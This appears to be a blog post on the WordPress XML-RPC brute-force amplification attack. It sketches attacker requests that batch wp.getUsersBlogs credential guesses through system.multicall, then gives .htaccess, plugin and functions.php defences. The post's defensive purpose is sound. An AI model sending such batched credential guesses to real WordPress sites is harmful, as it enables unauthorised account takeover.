Brute Force Amplification Attacks/XML-RPC Pingback Vulnerability against WP xmlrpc
A new type of attack has been reported against wordpress called the BRUTE FORCE AMPLIFICATION ATTACK or the XML-RPC Pingback Vulnerability.It mainly affects the ‘xmlrpc.php’ file.
Brute force attacks are very popular attacks on internet as we are on a server online via protocols such as SSH,FTP etc.This technique allows the attackers to try a large variety of wordpress username and password combinations in a single HTTP request instead of attacking the wp-login.php file which can be easily protected via .htaccess file.
Before going into the details of this attack first you should know about the xmlrpc file.
What is XML-RPC file?
XML-RPC is simply a way to make remote procedure calls via HTTP .In detail it is a set of implementations that allow software running on different operating systems in different running environments to make procedure calls on the internet via HTTP using XML as the encoding which is very simple to design and allows complex data structures to be transported and returned after processing.
It’s commonly used to execute various functions in a wordpress instance for APIs and other automated tasks.
Here the attackers are getting an advantage of make using the system.multicall method to attempt guessing more than hundreds of passwords within a single HTTP request against xmlrpc.
The attacker request looks as below.
< wp.getUsersBlogs admin admin123
Here the attacker tried admin/admin123 username/password combination. The server responds with an XML message whether the username/password combination is correct or not.Most attacks we are seeing in the wild are using the wp.getCategories method, which requires a username/password.ie authentication.
There are many other methods which needs to be authenticated like wp.getUsersBlogs, wp.newPost, wp.editPost, wp.deletePost etc.
By using the system.multicall method the attacker can try multiple username/password combinations in a single HTTP call as below.
system.multicall methodName wp.getUsersBlogs params admin password methodName wp.getUsersBlogs params admin password
The Resistance Methods.
Using the .htaccess file.
a.Protect the xmlrpc using RedirectMatch.
# protect xmlrpc
RedirectMatch 403 (?i)/xmlrpc.php
The xmlrpc will be protected without taking matter on whether you have installed wordpress or not and without considering its location in the directory.
b.Protect using Order/Deny.
# protect xmlrpc
Order Deny,Allow Deny from all
This is an easy method of protecting the xmlrpc.By using this technique you can customise the xmlrpc.php .htaccess to allow access from specific IP addresses and redirecting blocked requests to a specific page.
2. Protection Through Plugins.
Search for an “xmlrpc plugin” ,install it and activate which can disable the xmlrpc.php.
3. Protect using functions.
You can protect the xmlrpc.php by using certain functions that can be added directly in functions.php file which is able to disable the ‘system.multicall’ instead using plugins and without messing up the .htaccess file.
function shapeSpace_disable_xmlrpc_multicall($methods) { unset($methods['system.multicall']); return $methods; } add_filter('xmlrpc_methods', 'shapeSpace_disable_xmlrpc_multicall');
The disadvantage of using this method is that it is:
1.theme specific : basically means that the function will help to protect only the theme that is activated currently.
2.threat specific : means that this function disables only the system.multicall aspect of xmlrpc.php. So it works to protect against the Brute Force Amplification Attack specifically — not any of the other attacks that currently target the xmlrpc.php file. This is another reason why the .htaccess technique is an ideal choice for securing your site: it protects against all types of XML-RPC attacks.
Two Wrap up, .htaccess method is the best and most choosing method to protect the xmlrpc.php.